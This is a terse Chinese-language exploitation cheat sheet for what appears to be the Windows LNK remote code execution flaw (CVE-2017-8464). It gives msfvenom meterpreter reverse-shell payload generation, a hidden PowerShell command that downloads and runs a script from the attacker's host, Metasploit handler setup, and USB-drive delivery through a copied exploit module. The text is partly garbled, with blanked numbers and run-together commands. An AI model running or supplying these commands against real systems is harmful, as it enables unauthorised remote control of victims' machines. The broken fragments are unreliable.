常用CVE
CVE--
受影响版本
Windows /Windows 8.1/Windows RT 8.1/Windows /Windows Server /Windows Server R2/Windows Server /Windows Server R2/Windows Server 使用方式一
-kali下
.msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=KaliIP LPORT= -f psh-reflection>.ps1
.cp /root/.ps1 /var/www/html
-目标机器
.powershell -windowstyle hidden -exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('http://kaliIP/1.ps1');test.ps1"
-Kali下
msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST KaliIP
set LPORT
exploit 使用方式二
-kali下
下载 - https://github.com/rapid7/metasploit-framework/archive/master.zip
将压缩包内modules/exploits/windows/fileformat中的cve_2017_8464_lnk_rce.rb复制到目录/usr/share/metasploit-framework/modules/exploits/windows/fileformat
将压缩包内data/exploits中的cve-2017-8464文件夹复制到/usr/share/metasploit-framework/data/exploits 打开终端在/root/.msf4/local中生成我们想要的文件msfconsole
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [你的IP地址]
exploituse multi/handlerset paylaod windows/meterpreter/reverse_tcp set LHOST [你的IP地址] run-目标机
将可移动磁盘插入靶机中,如果靶机开启了自动播放,选择浏览文件时即可回弹 使用方式三 -POC/EXP